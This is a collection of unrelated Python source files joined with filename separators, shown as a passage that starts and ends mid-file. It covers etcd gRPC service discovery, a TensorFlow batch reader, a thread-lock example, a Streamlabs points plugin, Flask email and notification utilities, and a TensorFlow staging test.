# I create a new loop to be able to use run_forever() and then stop() without affecting our main loop
loop = asyncio.get_event_loop()
threading.Thread(target=partial(asyncio.run_coroutine_threadsafe, create_db(), loop), daemon=True).start()
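# Hedged usage sketch, not part of the original module: once `database` is
# connected, the Users helpers above can park a user in a "waiting" state and
# clear it again. The handler name and the telegram_id value are illustrative
# assumptions; `orm`'s `objects.get` is queried here by the model's `id` column.
async def example_mark_user_waiting(telegram_id=12345):
    user = await Users.objects.get(id=telegram_id)
    # Remember what input we are waiting for from this user.
    await user.wait_for('timezone', waiting_param='settings')
    # ... handle the reply elsewhere, then clear the waiting state:
    await user.wait_end()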
|
client_discovery.py
|
import json
import logging
import threading
from functools import wraps
import grpc
from etcd3.events import PutEvent, DeleteEvent
from grpc_microservice.common.client import header_manipulator_client_interceptor
from grpc_microservice.common.exceptions import NoServerNodeException
from grpc_microservice.common.meta_cls import Singleton, time_this
from grpc_microservice.etcd_minoter.client.load_balance import LeastActiveLoadBalance, RandomLoadBalance
from grpc_microservice.etcd_minoter.etcd_manager import EtcdServer
def choose_address(server_name, **kwargs):
"""
    Select the address of the service to connect to; this is a reserved hook for later extension.
"""
return ServerDiscovery().choice_grpc_server(server_name, **kwargs)
def proxy_grpc_func(stub, module_name):
_stub = stub
_module_name = module_name
def decorate(func):
@time_this
@wraps(func)
def wrapper(*args, **kwargs):
_func = func.__name__
_point, _token = choose_address('/{}/{}'.format(_module_name, _func), **kwargs)
#
header_adder_interceptor = header_manipulator_client_interceptor.server_access_interceptor(_token)
with grpc.insecure_channel(_point) as channel:
intercept_channel = grpc.intercept_channel(channel, header_adder_interceptor)
__stub = _stub(intercept_channel)
_func_stub = getattr(__stub, _func)
ret = _func_stub(args[1])
return ret
return wrapper
return decorate
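# Hedged usage sketch (illustrative only, not part of this module): the
# decorator above is meant to wrap methods on a thin client class. The wrapped
# body never runs -- the wrapper resolves '/<module>/<method>' through
# ServerDiscovery, opens a channel with the token interceptor, and forwards
# args[1] to the matching stub method. `EchoStub` and `EchoRequest` below are
# assumed protobuf-generated names used purely for illustration:
#
#     class EchoClient(object):
#         @proxy_grpc_func(EchoStub, 'EchoServer')
#         def Echo(self, request):
#             pass  # unused; the decorator performs the remote call
#
#     reply = EchoClient().Echo(EchoRequest(message='hi'))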
class ServerDiscovery(EtcdServer, metaclass=Singleton):
log = logging.getLogger(__name__)
def __init__(self, balance_strategy=None, logger=None):
super().__init__(logger)
if balance_strategy == "LeastActiveLoadBalance":
self.balance_strategy = LeastActiveLoadBalance()
else:
self.balance_strategy = RandomLoadBalance()
self.server_colletion = {}
self.logger = logger or self.log
self.pro = True # debug False
def set_balance_strategy(self, balance_strategy):
if balance_strategy == "LeastActiveLoadBalance":
self.balance_strategy = LeastActiveLoadBalance()
else:
self.balance_strategy = RandomLoadBalance()
def start(self, read_once=False):
"""开始服务调用接口"""
self.read_servers()
self.logger.info("etcd_minoter 注册中心启动成功")
if not read_once:
t = threading.Thread(target=self.loop, name='LoopThread')
t.start()
def delete_filter(self, _server_name, _server_uuid):
if self.server_colletion.get('{}/{}'.format(_server_name, _server_uuid), None):
self.server_colletion.pop('{}/{}'.format(_server_name, _server_uuid))
_tmp_force_server = self.__force_server.get(_server_name, [])
if _server_uuid in _tmp_force_server:
_tmp_force_server.remove(_server_uuid)
if len(_tmp_force_server) == 0:
if self.__force_server.get(_server_name, None):
self.__force_server.pop(_server_name)
else:
self.__force_server[_server_name] = _tmp_force_server
_tmp_normal_server = self.__normal_server.get(_server_name, [])
if _server_uuid in _tmp_normal_server:
_tmp_normal_server.remove(_server_uuid)
if len(_tmp_normal_server) == 0:
if self.__normal_server.get(_server_name, None):
self.__normal_server.pop(_server_name)
else:
self.__normal_server[_server_name] = _tmp_normal_server
def loop(self):
        # Start watching for key changes.
events_iterator, cancel = self.etcd_client.watch_prefix(self.ROOT)
for event in events_iterator:
self.logger.info("刷新服务开始")
if isinstance(event, PutEvent):
_server_uuid, _server_name, _server_info = self.__read_node(event.key, event.value)
                # If only active_index changed, just refresh it; otherwise re-add and convert the node.
_key = '{}/{}'.format(_server_name, _server_uuid)
old = self.server_colletion.get(_key, None)
if old:
if old['pro'] == _server_info['pro'] and old['force'] == _server_info['force'] and old['weight'] == \
_server_info['weight'] and old['offline'] == _server_info['offline'] and old['ip'] == \
_server_info['ip'] and old['port'] == _server_info['port']:
                        # Just refresh the active index.
self.server_colletion[_key]['active_index'] = _server_info['active_index']
                        print('refreshing active index')
continue
                    print('node updated, resetting')
self.delete_filter(_server_name, _server_uuid)
                # Could be a new node or a modified one; overwrite by default.
self.server_colletion['{}/{}'.format(_server_name, _server_uuid)] = _server_info
self.tran_s_once(_key, _server_info)
            # Treat anything else as newly added by default.
elif isinstance(event, DeleteEvent):
_server_uuid, _server_name, _ = self.__read_node(event.key, event.value)
self.delete_filter(_server_name, _server_uuid)
print(self.server_colletion)
def tran_s_once(self, _server_name_uuid, _server_info):
_server_name = "/".join(_server_name_uuid.split('/')[:-1])
        # Filter out offline endpoints.
if _server_info['pro'] != self.pro or _server_info['offline']:
return
        # If this endpoint is marked for forced invocation.
if _server_info['force']:
_force_server = self.__force_server.get(_server_name, [])
_force_server.append(_server_info['uuid'])
self.__force_server[_server_name] = _force_server
_normal_server = self.__normal_server.get(_server_name, [])
_normal_server.append(_server_info['uuid'])
self.__normal_server[_server_name] = _normal_server
def tran_s(self):
self.__normal_server = {}
self.__force_server = {}
_server_colletion = self.server_colletion
for _uuid, _server_info in _server_colletion.items():
self.tran_s_once(_uuid, _server_info)
def filter_foce(self, server_name):
server_pool = self.__force_server.get(server_name, None)
if server_pool and len(server_pool) > 0:
return server_pool
server_pool = self.__normal_server.get(server_name, None)
if server_pool and len(server_pool) > 0:
return server_pool
        raise NoServerNodeException('no server node available')
def __read_node(self, path, value):
_v = value.decode("utf-8")
_path = path.decode("utf-8").replace('/GRPC', '').split('/')
_module = _path[1]
_api = _path[2]
_server_uuid = _path[3]
_server_info = json.loads(_v, encoding='utf-8')
_server_name = '/{}/{}'.format(_module, _api)
return _server_uuid, _server_name, _server_info
def read_servers(self):
"""获取服务列表"""
self.server_colletion = {}
childrens = self.etcd_client.get_prefix(self.ROOT)
for value, _meta in childrens:
_uuid, _server_name, _server_info = self.__read_node(_meta.key, value)
self.server_colletion['{}/{}'.format(_server_name, _uuid)] = _server_info
def get_point(self, server_name, server_key):
server_node = self.server_colletion[server_name + '/' + server_key['uuid']]
return ":".join([server_node['ip'], server_node['port']]), server_node['uuid']
def choice_grpc_server(self, server_name, **kwargs):
        # Filter according to the configured load-balancing strategy.
uuids = self.filter_foce(server_name)
server_invokers = []
for _key in uuids:
server_invokers.append(self.server_colletion['{}/{}'.format(server_name, _key)])
return self.get_point(server_name, self.balance_strategy.choice(server_invokers, **kwargs))
def designation_point(self, ):
"""
        # TODO: support invoking a specified service endpoint
        Pin the call to a specific service endpoint.
"""
        # In the test environment, distinguish whether verification is required.
        # force: the endpoint is invoked preferentially; selector options are IP:port / uuid.
        pass
        # In production, only production services are exposed (see the offline flag).
        # If no single endpoint is pinned, distribute by rule and weight when selecting;
        # otherwise pick the forced endpoint.
if __name__ == '__main__':
server_inspecte = ServerDiscovery(balance_strategy="LeastActiveLoadBalance")
server_inspecte.start()
server_inspecte.tran_s()
for x in range(50):
node_info = server_inspecte.choice_grpc_server('/RoomServer/CreateRoom')
print(node_info)
print("启动成功")
|
copynet_batcher.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Batch reader to sequence generation model, with bucketing support.
Continuously reads source and target from tf.Example file, batches the
sources and targets, and returns the batched inputs.
Example:
batcher = batch_reader.Batcher(...)
while True:
(...) = batcher.NextBatch()
"""
import collections
import queue
from random import random
from random import shuffle
from threading import Thread
import time
import numpy as np
import tensorflow as tf
import data
ModelInput = collections.namedtuple(
'ModelInput',
'enc_input dec_input dec_target_g dec_target_c enc_len dec_len '
'source targets')
BUCKET_CACHE_BATCH = 100
QUEUE_NUM_BATCH = 100
DAEMON_READER_THREADS = 16
BUCKETING_THREADS = 4
class Batcher(object):
"""Batch reader with shuffling and bucketing support."""
def __init__(self, data_path, config):
"""Batcher initializer.
Args:
data_path: tf.Example filepattern.
config: model hyperparameters.
"""
self._data_path = data_path
self._config = config
self._input_vocab = config.input_vocab
self._output_vocab = config.output_vocab
self._source_key = config.source_key
self._target_key = config.target_key
self.use_bucketing = config.use_bucketing
self._truncate_input = config.truncate_input
self._input_queue = queue.Queue(QUEUE_NUM_BATCH * config.batch_size)
self._bucket_input_queue = queue.Queue(QUEUE_NUM_BATCH)
self._input_threads = []
for _ in range(DAEMON_READER_THREADS):
self._input_threads.append(Thread(target=self._FillInputQueue))
self._input_threads[-1].daemon = True
self._input_threads[-1].start()
self._bucketing_threads = []
for _ in range(BUCKETING_THREADS):
self._bucketing_threads.append(Thread(target=self._FillBucketInputQueue))
self._bucketing_threads[-1].daemon = True
self._bucketing_threads[-1].start()
self._watch_thread = Thread(target=self._WatchThreads)
self._watch_thread.daemon = True
self._watch_thread.start()
def NextBatch(self):
"""Returns a batch of inputs for model.
Returns:
Tuple (enc_batch, dec_batch, target_gen_batch, target_cop_batch,
enc_input_len, dec_input_len,
loss_weights, origin_sources, origin_targets) where:
enc_batch: A batch of encoder inputs [batch_size, config.enc_timestamps].
dec_batch: A batch of decoder inputs [batch_size, config.dec_timestamps].
target_gen_batch: A batch of targets [batch_size, config.dec_timestamps].
target_cop_batch: A batch of targets [batch_size, config.dec_timestamps].
enc_input_len: Encoder input lengths of the batch.
dec_input_len: Decoder input lengths of the batch.
loss_weights: Weights for loss function, 1 if not padded, 0 if padded.
source: string. Original source words.
targets: List of strings. Original target words.
"""
enc_batch = np.zeros(
(self._config.batch_size, self._config.max_input_len), dtype=np.int32)
enc_input_lens = np.zeros((self._config.batch_size), dtype=np.int32)
dec_batch = np.zeros(
(self._config.batch_size, self._config.max_output_len), dtype=np.int32)
dec_output_lens = np.zeros((self._config.batch_size), dtype=np.int32)
target_gen_batch = np.zeros(
(self._config.batch_size, self._config.max_output_len), dtype=np.int32)
target_cop_batch = np.zeros(
(self._config.batch_size, self._config.max_output_len), dtype=np.int32)
loss_weights = np.zeros(
(self._config.batch_size, self._config.max_output_len),
dtype=np.float32)
source = ['None'] * self._config.batch_size
targets = [['None']] * self._config.batch_size
buckets = self._bucket_input_queue.get()
for i in range(self._config.batch_size):
(enc_inputs, dec_inputs, dec_targets_gen, dec_targets_cop, enc_input_len,
dec_output_len, source_i, targets_i) = buckets[i]
enc_input_lens[i] = enc_input_len
dec_output_lens[i] = dec_output_len
enc_batch[i, :] = enc_inputs[:]
dec_batch[i, :] = dec_inputs[:]
target_gen_batch[i, :] = dec_targets_gen[:]
target_cop_batch[i, :] = dec_targets_cop[:]
source[i] = source_i
targets[i] = targets_i
for j in range(dec_output_len):
loss_weights[i][j] = 1
return (enc_batch, dec_batch, target_gen_batch, target_cop_batch,
enc_input_lens, dec_output_lens, loss_weights, source, targets)
def _FillInputQueue(self):
"""Fills input queue with ModelInput."""
# input gets padded
pad_id = self._input_vocab.WordToId(data.PAD_TOKEN)
    # outputs get a start id and are padded with end ids
end_id = self._output_vocab.WordToId(data.SENTENCE_END)
input_gen = self._TextGenerator(data.ExampleGen(self._data_path))
while True:
(source, targets) = next(input_gen)
# target = choice(targets)
target = targets[0]
# Convert sentences to word IDs, stripping existing <s> and </s>.
enc_inputs = data.GetWordIds(source, self._input_vocab)
dec_inputs_gen = data.GetWordIds(target, self._output_vocab)
dec_inputs_cop = data.GetWordIndices(
target, source, self._input_vocab, position_based_indexing=True)
# Filter out too-short input
if len(enc_inputs) < self._config.min_input_len:
        tf.logging.warning('Drop an example - input too short: %d (min: %d)',
len(enc_inputs), self._config.min_input_len)
continue
if len(dec_inputs_gen) < self._config.min_input_len:
        tf.logging.warning('Drop an example - output too short: %d (min: %d)',
                           len(dec_inputs_gen), self._config.min_input_len)
continue
# If we're not truncating input, throw out too-long input
if not self._truncate_input:
if len(enc_inputs) > self._config.max_input_len:
          tf.logging.warning('Drop an example - input too long: %d (max: %d)',
len(enc_inputs), self._config.max_input_len)
continue
if len(dec_inputs_gen) > self._config.max_output_len:
          tf.logging.warning('Drop an example - output too long: %d (max: %d)',
len(dec_inputs_gen), self._config.max_output_len)
continue
# If we are truncating input, do so if necessary
else:
if len(enc_inputs) > self._config.max_input_len:
enc_inputs = enc_inputs[:self._config.max_input_len]
dec_inputs_cop = [
pos if pos <= self._config.max_input_len else 0
for pos in dec_inputs_cop
]
if len(dec_inputs_gen) > self._config.max_output_len:
dec_inputs_gen = dec_inputs_gen[:self._config.max_output_len]
dec_inputs_cop = dec_inputs_cop[:self._config.max_output_len]
# dec_targets_gen is dec_inputs without <s> at beginning, plus </s> at end
dec_targets_gen = dec_inputs_gen[1:]
dec_targets_gen.append(end_id)
      # dec_targets_cop is dec_inputs_cop without <s> at beginning, plus the
      # source end position appended at the end
dec_targets_cop = dec_inputs_cop[1:]
end_position = len(enc_inputs)
dec_targets_cop.append(end_position)
enc_input_len = len(enc_inputs)
dec_output_len = len(dec_targets_gen) # is equal to len(dec_targets_cop)
# Pad if necessary
while len(enc_inputs) < self._config.max_input_len:
enc_inputs.append(pad_id)
while len(dec_inputs_gen) < self._config.max_output_len:
dec_inputs_gen.append(end_id)
while len(dec_targets_gen) < self._config.max_output_len:
dec_targets_gen.append(end_id)
while len(dec_targets_cop) < self._config.max_output_len:
dec_targets_cop.append(end_position)
element = ModelInput(enc_inputs, dec_inputs_gen, dec_targets_gen,
dec_targets_cop, enc_input_len, dec_output_len,
source, targets)
self._input_queue.put(element)
def _FillBucketInputQueue(self):
"""Fills bucketed batches into the bucket_input_queue."""
while True:
inputs = []
for _ in range(self._config.batch_size * BUCKET_CACHE_BATCH):
inputs.append(self._input_queue.get())
if self.use_bucketing:
inputs = sorted(inputs, key=lambda inp: inp.enc_len)
batches = []
for i in range(0, len(inputs), self._config.batch_size):
batches.append(inputs[i:i + self._config.batch_size])
shuffle(batches)
for b in batches:
self._bucket_input_queue.put(b)
def _WatchThreads(self):
"""Watches the daemon input threads and restarts if dead."""
while True:
time.sleep(60)
input_threads = []
for t in self._input_threads:
if t.is_alive():
input_threads.append(t)
else:
tf.logging.error('Found input thread dead.')
new_t = Thread(target=self._FillInputQueue)
input_threads.append(new_t)
input_threads[-1].daemon = True
input_threads[-1].start()
self._input_threads = input_threads
bucketing_threads = []
for t in self._bucketing_threads:
if t.is_alive():
bucketing_threads.append(t)
else:
tf.logging.error('Found bucketing thread dead.')
new_t = Thread(target=self._FillBucketInputQueue)
bucketing_threads.append(new_t)
bucketing_threads[-1].daemon = True
bucketing_threads[-1].start()
self._bucketing_threads = bucketing_threads
def _TextGenerator(self, example_gen):
"""Generates source and target text from tf.Example.
Args:
example_gen: ExampleGen that yields tf.Example.
Yields:
      Tuple (source_text, target_texts) where:
        source_text: Source text string.
        target_texts: List of target text strings (well-formed).
"""
while True:
example = next(example_gen)
try:
# TARGET
all_target_texts = []
if len(self._target_key.split(',')) > 1:
all_target_text = ''
counter = -1
# concat different keys (not combinable with multiple targets)
for key in self._target_key.split(','):
if counter >= 0:
all_target_text += ' '
all_target_text += self._GetExFeatureText(example, key)[0].strip()
counter += 1
all_target_text = self._AddSentenceBoundary(all_target_text)
all_target_texts.append(all_target_text)
else:
key = self._target_key
for target_text in self._GetExFeatureText(example, key):
target_text = target_text.strip()
target_text = self._AddSentenceBoundary(target_text)
all_target_texts.append(target_text)
# SOURCE
all_source_text = ''
counter = -1
# if input is list of keys we concat them using separator tokens.
for key in self._source_key.split(','):
if counter >= 0:
# <sep_0>, etc. must already be part of the vocab
if self._input_vocab.WordToId('<sep_' + str(counter) + '>') <= 0:
tf.logging.error('Separator token missing: <sep_%s>',
str(counter))
all_source_text += ' <sep_' + str(counter) + '> '
          # special key to add the length of the output to the input
if key == '%LENGTH%':
all_source_text += str(len(all_target_texts[0].split()))
elif len(key.split('%')) == 2:
if random() < float(key.split('%')[0]) / 100:
all_source_text += self._GetExFeatureText(
example, key.split('%')[1])[0].strip()
else:
all_source_text += ' <no_callout> '
else:
all_source_text += self._GetExFeatureText(example, key)[0].strip()
counter += 1
all_source_text = self._AddSentenceBoundary(all_source_text)
yield (all_source_text, all_target_texts)
except ValueError as e:
tf.logging.error(e)
tf.logging.error('Failed to get article or abstract from example')
continue
def _AddSentenceBoundary(self, text):
"""Pads text with start end end of sentence token iff needed.
Args:
text: text to be padded.
Returns:
A text with start and end tokens.
"""
if not text.startswith(data.SENTENCE_START):
text = data.SENTENCE_START + ' ' + text
if not text.endswith(data.SENTENCE_END):
text = text + ' ' + data.SENTENCE_END
return text
def _GetExFeatureText(self, example, key):
"""Extracts text for a feature from tf.Example.
Args:
example: tf.Example.
key: Key of the feature to be extracted.
Returns:
      A list of text values extracted for the feature.
"""
values = []
for value in example.features.feature[key].bytes_list.value:
values.append(value.decode("utf-8"))
return values
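# Hedged construction sketch (not part of the original module): Batcher only
# needs a `config` object exposing the attributes read above; the namedtuple
# and every field value below are illustrative assumptions, and the vocab
# objects are expected to come from the `data` module (not shown here).
#
#     BatcherConfig = collections.namedtuple(
#         'BatcherConfig',
#         'input_vocab output_vocab source_key target_key use_bucketing '
#         'truncate_input batch_size max_input_len max_output_len min_input_len')
#     config = BatcherConfig(
#         input_vocab=input_vocab, output_vocab=output_vocab,
#         source_key='source', target_key='target', use_bucketing=True,
#         truncate_input=True, batch_size=32, max_input_len=120,
#         max_output_len=30, min_input_len=2)
#     batcher = Batcher('data/train-*.tfrecord', config)
#     (enc_batch, dec_batch, target_gen_batch, target_cop_batch, enc_lens,
#      dec_lens, loss_weights, sources, targets) = batcher.NextBatch()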
|
Chap10_Example10.32.py
|
from threading import *
class abc:
def __init__(self, seat_available):
self.seat_available = seat_available
self.mylock = Lock()
def abc_reserveseat(self, seat_required):
self.mylock.acquire()
print("Number of seats remaining : ", self.seat_available)
if self.seat_available >= seat_required:
print(f"{current_thread().name} was alloted the seat No. L{self.seat_available}")
self.seat_available = self.seat_available - 1
else:
print("All the seats are booked now Sorry !")
self.mylock.release()
obj_abc = abc(2)
myt1 = Thread(target=obj_abc.abc_reserveseat, args=(1,), name='Saurabh')
myt2 = Thread(target=obj_abc.abc_reserveseat, args=(1,), name='Nilesh')
myt3 = Thread(target=obj_abc.abc_reserveseat, args=(1,), name='Divya')
myt1.start()
myt2.start()
myt3.start()
print("Main Thread")
|
Quizzical_StreamlabsSystem.py
|
# ---------------------------------------
# Import Libraries
# ---------------------------------------
import sys
import clr
clr.AddReference("IronPython.SQLite.dll")
clr.AddReference("IronPython.Modules.dll")
import os
from threading import Thread, Event
from json import loads
from Queue import Queue
import traceback
sys.path.append(os.path.join(os.path.dirname(__file__), 'lib'))
# noinspection PyUnresolvedReferences
from quizzical_server import start_http_server
# ---------------------------------------
# [Required] Script Information
# ---------------------------------------
ScriptName = 'Quizzical'
Website = 'github.com/NatKarmios/Quizzical'
Description = 'A companion script to help Quizzical integrate with the StreamLabs Bot currency system.'
Creator = 'Nat Karmios'
Version = '1.0.0'
# ---------------------------------------
# Set Variables
# ---------------------------------------
HOST = '127.0.0.1'
PORT = 23120
enabled = True
logQueue = Queue()
add_points_event = Event()
add_points_event.set()
add_points_data = {}
add_points_reply = []
# ---------------------------------------
# [Required] Initialize Data (Only called on Load)
# ---------------------------------------
def Init():
Thread(target=start_server).start()
log('Quizzical companion script, locked and loaded!')
# ---------------------------------------
# [Required] Execute Data / Process Messages
# ---------------------------------------
def Execute(_):
# This plugin has no need for Execute() to be called.
pass
# ---------------------------------------
# [Required] Tick Function
# ---------------------------------------
def Tick():
global add_points_event
global add_points_data
global add_points_reply
if not add_points_event.is_set():
add_points_reply = list(Parent.AddPointsAll(add_points_data))
log('%s users credited by Quizzical' % (len(add_points_data) - len(add_points_reply)))
add_points_event.set()
while not logQueue.empty():
Parent.Log('Quizzical', logQueue.get())
def Unload():
pass
def ScriptToggled(state):
global enabled
enabled = state
def log(msg):
logQueue.put(msg)
def handle_add_points_request(raw_data, request_handler):
global add_points_data
global add_points_event
global add_points_reply
if not enabled:
request_handler.reply({
'success': False,
'message': 'The Quizzical companion script is disabled!'
})
return
try:
# Throws if the post data fails to parse from JSON
try:
data = loads(raw_data)
except:
raise ValueError
# This checks that:
# 1. the data is a dictionary
# 2. the data contains the 'amount' attribute
# 3. the 'amount' attribute is an integer
# 4. the data contains the 'users' attribute
# 5. the 'users' attribute is a list
# 6. each value of the 'users' list attribute is a string
if not isinstance(data, dict) \
or 'amount' not in data \
or not isinstance(data['amount'], int) \
or 'users' not in data \
or not isinstance(data['users'], list) \
or any(map(lambda user: not isinstance(user, (str, unicode)), data['users'])):
raise ValueError
amount = data['amount']
users = data['users']
add_points_data = dict(map(lambda user: (user.lower(), amount), users))
add_points_event.clear()
add_points_event.wait()
try:
reply_data = {
'success': True,
'message': '%s/%s users credited.' % (len(users) - len(add_points_reply), len(users)),
'failedToAdd': add_points_reply
}
request_handler.reply(reply_data)
except:
log(traceback.format_exc())
except ValueError:
request_handler.reply({'success': False, 'msg': 'Malformed request'}, response_code=400)
def handle_ping():
log('Pinged by (probably) Quizzical!')
def start_server():
start_http_server(handle_add_points_request, handle_ping)
Init()
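# Hedged request-shape sketch (not part of the original script): Quizzical is
# expected to POST a JSON body like the one below to the add-points endpoint
# served by start_http_server; the field names follow the validation performed
# in handle_add_points_request above, while the concrete values are
# illustrative assumptions.
EXAMPLE_ADD_POINTS_REQUEST = '{"amount": 50, "users": ["viewer_one", "viewer_two"]}'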
|
util.py
|
from app import app, mail
from app.oauth import require_oauth
from app.models import User
from flask import render_template, url_for, abort, current_app, make_response
from flask_mail import Message
import functools
from authlib.flask.oauth2 import current_token
from authlib.specs.rfc6749 import OAuth2Error
from threading import Thread
from datetime import datetime, timedelta
from app import push
from apns2.payload import Payload
from apns2.errors import BadDeviceToken, Unregistered
def asynchronous(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
@asynchronous
def send_email(app, to, subject, template):
with app.app_context():
msg = Message(subject, recipients=[to], html=template)
mail.send(msg)
def verify_url_token(token):
user = User.query.filter_by(url_token=token).first()
if not user:
return None
expiration = int(app.config['URL_TOKEN_EXPIRATION'])
if user.url_token_timestamp < datetime.utcnow() - timedelta(seconds=expiration):
return None
return user
def send_verification_email(user, url):
token = user.generate_url_token()
verify_url = url_for('.mail_verification', token=token, _external=url)
html = render_template('mail_verification_mail.html', url=verify_url, username=user.username)
send_email(current_app._get_current_object(), user.email, 'メールアドレス確認', html)
return verify_url
def send_password_reset_email(user, url):
token = user.generate_url_token()
reset_url = url_for('.password_reset', token=token, _external=url)
html = render_template('password_reset_mail.html', url=reset_url, username=user.username)
send_email(current_app._get_current_object(), user.email, 'パスワードリセットを受け付けました', html)
return reset_url
def send_pwreset_no_user_found_email(email):
html = render_template('pwreset_no_user_found.html')
send_email(current_app._get_current_object(), email, f'{app.config["APP_NAME"]} パスワードリセット', html)
def notify(user, alert, custom=None):
notify_to_ios(user, alert, custom)
notify_to_android(user, alert, custom)
def notify_to_ios(user, alert, custom):
tokens = [ios_device_token
for ios_device_token in user.ios_device_tokens
if ios_device_token.value and not ios_device_token.is_revoked]
topic = 'Yuma.book-sns-app'
payload = Payload(alert=alert, sound="default", custom=custom)
for token in tokens:
try:
push.send_notification(token.value, payload, topic)
except BadDeviceToken:
token.revoke()
except Unregistered:
print('Device token unregistered')
def notify_to_android(user, alert, custom):
pass
def require_oauth_and_user_activation(scope=None):
"""Extends 'require_oauth' with checking if user.is_active."""
def wrapper(f):
@functools.wraps(f)
def decorated(*args, **kwargs):
try:
require_oauth.acquire_token(scope)
except OAuth2Error as error:
abort(401)
if not current_token.user.is_active:
abort(401)
return f(*args, **kwargs)
return decorated
return wrapper
def render_template_rest(template, status_code=200, **kwargs):
return make_response(render_template(template, **kwargs), status_code, {'Content-Type': 'text/html'})
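# Hedged usage sketch (not part of the original module): the decorator factory
# above is intended to wrap Flask view functions beneath the route decorator.
# The blueprint name `api`, the route, the scope string and the template name
# below are illustrative assumptions:
#
#     @api.route('/me')
#     @require_oauth_and_user_activation('profile')
#     def get_me():
#         return render_template_rest('profile.html', user=current_token.user)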
|
stage_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
TIMEOUT = 1
class StageTest(test.TestCase):
def testSimple(self):
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea([dtypes.float32])
stage = stager.put([v])
y = stager.get()
y = math_ops.reduce_max(math_ops.matmul(y, y))
G.finalize()
with self.test_session(use_gpu=True, graph=G) as sess:
sess.run(stage, feed_dict={x: -1})
for i in range(10):
_, yval = sess.run([stage, y], feed_dict={x: i})
self.assertAllClose(4 * (i - 1) * (i - 1) * 128, yval, rtol=1e-4)
def testMultiple(self):
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea([dtypes.float32, dtypes.float32])
stage = stager.put([x, v])
z, y = stager.get()
y = math_ops.reduce_max(z * math_ops.matmul(y, y))
G.finalize()
with self.test_session(use_gpu=True, graph=G) as sess:
sess.run(stage, feed_dict={x: -1})
for i in range(10):
_, yval = sess.run([stage, y], feed_dict={x: i})
self.assertAllClose(
4 * (i - 1) * (i - 1) * (i - 1) * 128, yval, rtol=1e-4)
def testDictionary(self):
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea(
[dtypes.float32, dtypes.float32],
shapes=[[], [128, 128]],
names=['x', 'v'])
stage = stager.put({'x': x, 'v': v})
ret = stager.get()
z = ret['x']
y = ret['v']
y = math_ops.reduce_max(z * math_ops.matmul(y, y))
G.finalize()
with self.test_session(use_gpu=True, graph=G) as sess:
sess.run(stage, feed_dict={x: -1})
for i in range(10):
_, yval = sess.run([stage, y], feed_dict={x: i})
self.assertAllClose(
4 * (i - 1) * (i - 1) * (i - 1) * 128, yval, rtol=1e-4)
def testColocation(self):
gpu_dev = test.gpu_device_name()
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(gpu_dev):
stager = data_flow_ops.StagingArea([dtypes.float32])
y = stager.put([v])
expected_name = gpu_dev if 'gpu' not in gpu_dev else '/device:GPU:0'
self.assertEqual(y.device, expected_name)
with ops.device('/cpu:0'):
x = stager.get()
self.assertEqual(x.device, '/device:CPU:0')
G.finalize()
def testPeek(self):
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.int32, name='x')
p = array_ops.placeholder(dtypes.int32, name='p')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea([dtypes.int32, ], shapes=[[]])
stage = stager.put([x])
peek = stager.peek(p)
ret = stager.get()
G.finalize()
with self.test_session(use_gpu=True, graph=G) as sess:
for i in range(10):
sess.run(stage, feed_dict={x:i})
for i in range(10):
self.assertTrue(sess.run(peek, feed_dict={p:i}) == i)
def testSizeAndClear(self):
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32, name='x')
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea(
[dtypes.float32, dtypes.float32],
shapes=[[], [128, 128]],
names=['x', 'v'])
stage = stager.put({'x': x, 'v': v})
ret = stager.get()
size = stager.size()
clear = stager.clear()
G.finalize()
with self.test_session(use_gpu=True, graph=G) as sess:
sess.run(stage, feed_dict={x: -1})
self.assertEqual(sess.run(size), 1)
sess.run(stage, feed_dict={x: -1})
self.assertEqual(sess.run(size), 2)
sess.run(clear)
self.assertEqual(sess.run(size), 0)
def testCapacity(self):
capacity = 3
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.int32, name='x')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea([dtypes.int32, ],
capacity=capacity, shapes=[[]])
stage = stager.put([x])
ret = stager.get()
size = stager.size()
G.finalize()
from six.moves import queue as Queue
import threading
queue = Queue.Queue()
n = 8
with self.test_session(use_gpu=True, graph=G) as sess:
# Stage data in a separate thread which will block
